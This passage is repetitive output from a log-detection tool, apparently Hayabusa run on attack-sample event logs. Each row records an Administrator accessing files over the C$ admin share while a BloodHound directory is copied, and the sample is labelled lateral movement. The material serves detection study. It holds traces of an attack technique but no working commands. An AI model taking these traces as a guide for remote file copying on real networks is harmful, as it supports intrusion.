Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\src\components : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.249 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\src\icons : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.249 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\src\utils : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.249 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-is : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.259 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-is\cjs : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.259 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-is\umd : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.259 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-lifecycles-compat : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.259 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.269 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\__test__ : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.269 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\__test__\__snapshots__ : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.269 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\coverage : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.269 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\coverage\lcov-report : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.279 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.279 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\docs : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.279 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\docs\examples : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.279 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\examples : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.289 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\examples\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.289 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.289 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.289 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.289 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock\__tests__ : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.299 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock\config : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.299 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.299 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock\node_modules : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.299 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock\node_modules\react-prop-toggle : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.309 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-transition-group : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.309 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-transition-group\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.309 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-transition-group\utils : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.309 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\readable-stream : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.319 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\readable-stream\doc : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.319 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\readable-stream\doc\wg-meetings : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.319 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\readable-stream\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.319 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\readable-stream\lib\internal : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.319 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\regenerator-runtime : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.329 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\resize-observer-polyfill : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.329 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\resize-observer-polyfill\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.329 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\resize-observer-polyfill\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.329 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\resize-observer-polyfill\src\shims : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.339 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\resize-observer-polyfill\src\utils : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.339 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\rimraf : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.339 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\safe-buffer : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.339 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\scheduler : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.339 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\scheduler\cjs : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.349 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\scheduler\umd : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.349 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\setimmediate : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.349 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\signal-exit : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.349 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\ssf : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.359 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\ssf\bin : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.359 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-chain : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.359 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-chain\tests : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.369 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-json : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.369 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-json\filters : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.369 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-json\streamers : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.379 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-json\tests : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.379 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-json\utils : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.379 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\string_decoder : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.389 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\string_decoder\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.389 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\text-encoding : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.389 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\text-encoding\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.399 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\traverse : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.399 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\traverse\examples : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.399 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\traverse\test : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.409 